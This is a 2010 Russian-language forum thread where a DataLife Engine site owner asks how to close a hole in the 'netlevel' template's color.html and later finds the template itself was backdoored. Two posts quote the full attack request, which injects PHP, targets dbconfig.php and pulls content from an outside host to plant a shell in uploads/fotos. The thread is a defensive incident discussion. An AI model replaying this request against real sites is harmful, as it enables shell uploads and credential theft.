Ищу Способ защиты от color.html

Тема в разделе "DLE", создана пользователем Kewl, 24 янв 2010.

Информация :
Актуальная версия DataLife Engine 12.0
( Final Release v.12.0 | Скачать DataLife Engine | Скачать 12.0 demo )
Нужно ли обновляться | Как обновиться | Изменения в шаблонах
> Нет русских символов <
[Приватная тема DLE (Все подробности в ЛС к модератору раздела)]

Версии 11.3 и ниже - уязвимы!

Локализации | F.A.Q. | Внешний вид
Правила раздела | Правила форума
Обсуждение хайда карается баном!
В каждом сообщении указывайте версию DLE, которого они касаются!
Статус темы:
Закрыта.
Модераторы: killoff
  1. Kewl

    Kewl

    Регистр.:
    9 сен 2007
    Сообщения:
    249
    Симпатии:
    107
    сайт/templates/netlevel/bbcodes/color.html?install=

    /templates/netlevel/bbcodes/color.html?install=<?include('conect.php');?>&file=dbconfig.php&&path=engine/data/&&url=http://vip-base.ws/upload/36hd4635dbnxfslqrmcbaffl78243kgm/&path2_shell=uploads/fotos HTTP/1.0" 200 7677 "-" "-"

    как закрыть эту дырку?

    Вирус лег в uploads/fotos

    Спасибо.
     
  2. cat13

    cat13 Постоялец

    Регистр.:
    22 мар 2009
    Сообщения:
    84
    Симпатии:
    27
    После обращений таким запросом как ты дал просто вылазит колор таблица.
     
  3. saxel

    saxel Постоялец

    Регистр.:
    4 дек 2007
    Сообщения:
    118
    Симпатии:
    23
    посомтри в файле ./engine/modules/bbcodes.php
    думаю оно там... и не используйте нуллы подозрительные(думаю у вас нулл, или извените, если ошибся:))
     
    Kewl нравится это.
  4. Kewl

    Kewl

    Регистр.:
    9 сен 2007
    Сообщения:
    249
    Симпатии:
    107
    Подскажите проверенный) лучше ссылкой прям)

    Добавлено через 44 минуты
    в общем дыра оказалась в шаблоне netlevel.
    потестил на других шаблонах - не работает.
    а в данном работало сайт/templates/netlevel/bbcodes/color.html?install=%3C?include(%27conect.php%27);?%3E&file=dbconfig.php&&path=engine/data/&&url=http://vip-base.ws/upload/36hd4635dbnxfslqrmcbaffl78243kgm/&path2_shell=uploads/fotos
    шаблон снес, надеюсь теперь шелл никто не зальет =)
     
  5. acelotuse

    acelotuse

    Регистр.:
    31 мар 2009
    Сообщения:
    312
    Симпатии:
    37
    а откуда шаблон-то скачивали? С какого сайта, помните?
     
    Kewl нравится это.
  6. Kewl

    Kewl

    Регистр.:
    9 сен 2007
    Сообщения:
    249
    Симпатии:
    107

    с дле in ua, спасибо.. на самом деле сам шаблон был таким... Вдруг у кого-то будет данная проблема.. меняйте шаблон.. но дырка "добрая"!, так же совет попробуйте рипы все свои проверить данной строчкой.

    Еще раз спасибо, тем кто помогал.
     
Статус темы:
Закрыта.